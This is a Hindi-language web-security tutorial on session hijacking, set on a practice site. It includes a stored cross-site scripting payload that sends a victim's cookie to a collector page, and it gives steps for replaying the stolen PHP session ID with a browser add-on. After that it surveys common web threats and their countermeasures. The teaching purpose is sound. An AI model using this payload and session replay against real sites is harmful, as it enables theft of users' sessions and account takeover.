वेबसाइट हैक कैसे करें? साइट हैक करने की सामान्य तकनीकें
ओलिवर जोन्स
वेबसाइट हैकिंग तकनीक
पहले से कहीं ज़्यादा लोगों के पास इंटरनेट तक पहुँच है। इसने कई संगठनों को वेब-आधारित एप्लिकेशन विकसित करने के लिए प्रेरित किया है जिसका उपयोग उपयोगकर्ता संगठन के साथ बातचीत करने के लिए ऑनलाइन कर सकते हैं। वेब एप्लिकेशन के लिए खराब तरीके से लिखे गए कोड का इस्तेमाल संवेदनशील डेटा और वेब सर्वर तक अनधिकृत पहुँच प्राप्त करने के लिए किया जा सकता है।
इस ट्यूटोरियल में आप सीखेंगे कि वेबसाइट को कैसे हैक किया जाता है, और हम आपको इससे परिचित कराएंगे वेब एप्लीकेशन हैकिंग तकनीक और उसके जवाबी उपाय आप ऐसे हमलों से बचाव के लिए कुछ उपाय अपना सकते हैं।
वेबसाइट हैक कैसे करें
इस वेबसाइट हैकिंग व्यावहारिक परिदृश्य में, हम स्थित वेब एप्लिकेशन के उपयोगकर्ता सत्र को हाईजैक करने जा रहे हैं www.techpanda.orgहम कुकी सत्र आईडी को पढ़ने के लिए क्रॉस साइट स्क्रिप्टिंग का उपयोग करेंगे और फिर इसका उपयोग वैध उपयोगकर्ता सत्र का प्रतिरूपण करने के लिए करेंगे।
यह माना जाता है कि हमलावर के पास वेब एप्लिकेशन तक पहुंच है और वह उसी एप्लिकेशन का उपयोग करने वाले अन्य उपयोगकर्ताओं के सत्रों को हाईजैक करना चाहता है। इस हमले का लक्ष्य वेब एप्लिकेशन तक एडमिन एक्सेस प्राप्त करना हो सकता है, बशर्ते कि हमलावर का एक्सेस अकाउंट सीमित हो।
चरण 1) यूआरएल खोलें http://www.techpanda.org/.
अभ्यास के उद्देश्य से, SQL इंजेक्शन का उपयोग करके पहुँच प्राप्त करने की दृढ़ता से अनुशंसा की जाती है। इसे देखें लेख ऐसा कैसे करें इस बारे में अधिक जानकारी के लिए यहां क्लिक करें।
चरण 2) लॉगिन विवरण दर्ज करें.
लॉगिन ईमेल है admin@google.com, पासवर्ड है पासवर्ड२०१०.
चरण 3) डैशबोर्ड जाँचें.
यदि आपने सफलतापूर्वक लॉग इन कर लिया है, तो आपको निम्नलिखित डैशबोर्ड मिलेगा
चरण 4) नई सामग्री दर्ज करें.
नया संपर्क जोड़ें पर क्लिक करें और प्रथम नाम के रूप में निम्नलिखित दर्ज करें
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
चरण 5) जोड़ना Javascript.
उपरोक्त कोड का उपयोग करता है Javaलिपि. यह onclick इवेंट के साथ एक हाइपरलिंक जोड़ता हैजब अनजान उपयोगकर्ता लिंक पर क्लिक करता है, तो ईवेंट पुनर्प्राप्त करता है PHP कुकी सत्र आईडी और इसे भेजता है snatch_sess_id.php पेज के URL में सत्र आईडी के साथ
चरण 6) विवरण जोड़ें.
नीचे दिखाए अनुसार शेष विवरण दर्ज करें और परिवर्तन सहेजें पर क्लिक करें
चरण 7) डैशबोर्ड जाँचें.
अब आपका डैशबोर्ड निम्न स्क्रीन की तरह दिखाई देगा
चरण 8) सत्र आईडी जांचें.
नोट: स्क्रिप्ट कुछ दूरस्थ सर्वर पर मान भेज सकती है जहां PHPSESSID संग्रहीत है और फिर उपयोगकर्ता को वेबसाइट पर वापस भेज दिया जाता है जैसे कि कुछ भी नहीं हुआ हो।
नोट: आपको जो मूल्य मिलेगा वह इस वेबपेज में दिए गए मूल्य से भिन्न हो सकता है हैकिंग ट्यूटोरियल, लेकिन अवधारणा एक ही है
सत्र प्रतिरूपण का उपयोग करना Firefox और टैम्पर डेटा ऐड-ऑन
नीचे दिया गया फ़्लोचार्ट उन चरणों को दर्शाता है जिन्हें आपको इस अभ्यास को पूरा करने के लिए उठाना होगा।
- आप की आवश्यकता होगी Firefox इस अनुभाग के लिए वेब ब्राउज़र और टैम्पर डेटा ऐड-ऑन
- प्रारंभिक Firefox और नीचे दिए गए चित्र में दिखाए अनुसार ऐड इंस्टॉल करें
- छेड़छाड़ किए गए डेटा की खोज करें और फिर ऊपर दिखाए अनुसार इंस्टॉल पर क्लिक करें
- स्वीकार करें और स्थापित करें पर क्लिक करें...
- स्थापना पूर्ण होने पर अब पुनः प्रारंभ करें पर क्लिक करें
- मेनू बार सक्षम करें Firefox यदि यह नहीं दिखाया गया है
- टूल्स मेनू पर क्लिक करें और फिर नीचे दिखाए अनुसार डेटा छेड़छाड़ का चयन करें
- आपको निम्न विंडो मिलेगी। नोट: यदि Windows खाली न हो तो क्लियर बटन दबाएँ
- स्टार्ट टैम्पर मेनू पर क्लिक करें
- पर वापस स्विच करें Firefox वेब ब्राउज़र, प्रकार http://www.techpanda.org/dashboard.php फिर पेज लोड करने के लिए एंटर कुंजी दबाएं
- आपको टैम्पर डेटा से निम्न पॉप अप मिलेगा
- पॉप-अप विंडो में तीन (3) विकल्प हैं। टैम्पर विकल्प आपको सर्वर पर सबमिट करने से पहले HTTP हेडर जानकारी को संशोधित करने की अनुमति देता है.
- इस पर क्लिक करें
- आपको निम्न विंडो मिलेगी
- कॉपी करें PHP सत्र आईडी आपने अटैक यूआरएल से कॉपी किया और इसे बराबर चिह्न के बाद पेस्ट किया। अब आपका मान इस तरह दिखना चाहिए
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
- ओके बटन पर क्लिक करें
- आपको फिर से टैम्पर डेटा पॉपअप विंडो मिलेगी
- उस चेकबॉक्स को अनचेक करें जिसमें पूछा गया है कि छेड़छाड़ जारी रखें?
- पूरा होने पर सबमिट बटन पर क्लिक करें
- आपको नीचे दिखाए अनुसार डैशबोर्ड दिखाई देगा
नोट: हमने लॉग इन नहीं किया, हमने क्रॉस साइट स्क्रिप्टिंग का उपयोग करके प्राप्त PHPSESSID मान का उपयोग करके लॉग इन सत्र का प्रतिरूपण किया
वेब एप्लीकेशन क्या है? वेब खतरे क्या हैं?
वेब एप्लीकेशन (जिसे वेबसाइट भी कहा जाता है) क्लाइंट-सर्वर मॉडल पर आधारित एप्लीकेशन है। सर्वर डेटाबेस एक्सेस और व्यावसायिक तर्क प्रदान करता है। इसे वेब सर्वर पर होस्ट किया जाता है। क्लाइंट एप्लिकेशन क्लाइंट वेब ब्राउज़र पर चलता है। वेब एप्लिकेशन आमतौर पर ऐसी भाषाओं में लिखे जाते हैं जैसे Java, C#, और VB.Net, PHP, कोल्डफ्यूजन मार्कअप लैंग्वेज, आदि। वेब अनुप्रयोगों में उपयोग किए जाने वाले डेटाबेस इंजन में शामिल हैं MySQL, एमएस एसक्यूएल सर्वर, PostgreSQL, SQLite, आदि
शीर्ष वेबसाइट हैकिंग तकनीकें
अधिकांश वेब एप्लिकेशन इंटरनेट के माध्यम से सुलभ सार्वजनिक सर्वर पर होस्ट किए जाते हैं। यह उन्हें आसान पहुंच के कारण हमलों के लिए असुरक्षित बनाता है। निम्नलिखित सामान्य वेब एप्लिकेशन खतरे हैं।
- SQL इंजेक्शन - इस खतरे का लक्ष्य लॉगिन एल्गोरिदम को बायपास करना, डेटा में तोड़फोड़ करना आदि हो सकता है।
- सेवा हमलों का इनकार- इस खतरे का लक्ष्य वैध उपयोगकर्ताओं को संसाधन तक पहुंच से वंचित करना हो सकता है
- क्रॉस साइट स्क्रिप्टिंग XSS- इस खतरे का लक्ष्य ऐसा कोड इंजेक्ट करना हो सकता है जिसे क्लाइंट साइड ब्राउज़र पर निष्पादित किया जा सके।
- कुकी/सत्र विषाक्तता- इस खतरे का लक्ष्य हमलावर द्वारा अनधिकृत पहुंच प्राप्त करने के लिए कुकीज़/सत्र डेटा को संशोधित करना है।
- फॉर्म से छेड़छाड़ - इस खतरे का लक्ष्य ई-कॉमर्स अनुप्रयोगों में कीमतों जैसे फॉर्म डेटा को संशोधित करना है ताकि हमलावर को कम कीमतों पर वस्तुएं मिल सकें।
- कोड इंजेक्शन - इस खतरे का लक्ष्य PHP जैसे कोड को इंजेक्ट करना है, Python, आदि जो सर्वर पर निष्पादित किए जा सकते हैं। कोड बैकडोर स्थापित कर सकता है, संवेदनशील जानकारी प्रकट कर सकता है, आदि।
- विकरण- इस खतरे का लक्ष्य किसी वेबसाइट पर प्रदर्शित पृष्ठ को संशोधित करना और सभी पृष्ठ अनुरोधों को एक ऐसे पृष्ठ पर पुनर्निर्देशित करना है जिसमें हमलावर का संदेश हो।
अपनी वेबसाइट को हैक से कैसे सुरक्षित रखें?
कोई संगठन वेब सर्वर हमलों से खुद को बचाने के लिए निम्नलिखित नीति अपना सकता है।
- SQL इंजेक्शन - प्रसंस्करण के लिए डेटाबेस में सबमिट करने से पहले उपयोगकर्ता मापदंडों को साफ करने और मान्य करने से हमले की संभावनाओं को कम करने में मदद मिल सकती है SQL इंजेक्शन. डेटाबेस इंजन जैसे कि एमएस एसक्यूएल सर्वर, MySQL, आदि पैरामीटर और तैयार कथनों का समर्थन करते हैं। वे पारंपरिक SQL कथनों की तुलना में अधिक सुरक्षित हैं
- सेवा हमलों का इनकार - यदि हमला एक साधारण DoS है, तो फ़ायरवॉल का उपयोग संदिग्ध IP पते से ट्रैफ़िक को रोकने के लिए किया जा सकता है। नेटवर्क और घुसपैठ का पता लगाने वाली प्रणाली का उचित विन्यास भी घुसपैठ की संभावनाओं को कम करने में मदद कर सकता है। डॉस हमले सफल रहा.
- क्रॉस साइट स्क्रिप्टिंग – हेडर्स, URL के माध्यम से पारित पैरामीटर्स, फॉर्म पैरामीटर्स और छिपे हुए मानों को मान्य और स्वच्छ करने से XSS हमलों को कम करने में मदद मिल सकती है।
- कुकी/सत्र विषाक्तता - कुकीज़ की सामग्री को एन्क्रिप्ट करके, कुछ समय बाद कुकीज़ का समय समाप्त करके, कुकीज़ को उस क्लाइंट आईपी पते के साथ जोड़कर, जिसका उपयोग उन्हें बनाने के लिए किया गया था, इसे रोका जा सकता है।
- फॉर्म टेम्परिंग – उपयोगकर्ता इनपुट को संसाधित करने से पहले उसे मान्य और सत्यापित करके इसे रोका जा सकता है।
- कोड इंजेक्शन – सभी पैरामीटर को निष्पादन योग्य कोड के बजाय डेटा के रूप में मानकर इसे रोका जा सकता है। इसे लागू करने के लिए सैनिटाइजेशन और वैलिडेशन का उपयोग किया जा सकता है।
- विरूपण – एक अच्छी वेब एप्लिकेशन विकास सुरक्षा नीति को यह सुनिश्चित करना चाहिए कि यह सील कर दे वेब सर्वर तक पहुँचने के लिए आमतौर पर इस्तेमाल की जाने वाली कमज़ोरियाँयह ऑपरेटिंग सिस्टम, वेब सर्वर सॉफ्टवेयर और वेब एप्लिकेशन विकसित करते समय सर्वोत्तम सुरक्षा प्रथाओं का उचित कॉन्फ़िगरेशन हो सकता है।
सारांश
- वेब एप्लीकेशन सर्वर-क्लाइंट मॉडल पर आधारित है। क्लाइंट साइड सर्वर पर संसाधनों तक पहुँचने के लिए वेब ब्राउज़र का उपयोग करता है।
- वेब एप्लीकेशन आमतौर पर इंटरनेट के माध्यम से उपलब्ध होते हैं। इससे उन पर हमलों का खतरा बना रहता है।
- वेब अनुप्रयोग खतरों में SQL इंजेक्शन, कोड इंजेक्शन, XSS, डिफेसमेंट, कुकी पॉइज़निंग आदि शामिल हैं।
- वेब अनुप्रयोगों को विकसित करते समय एक अच्छी सुरक्षा नीति उन्हें सुरक्षित बनाने में मदद कर सकती है।
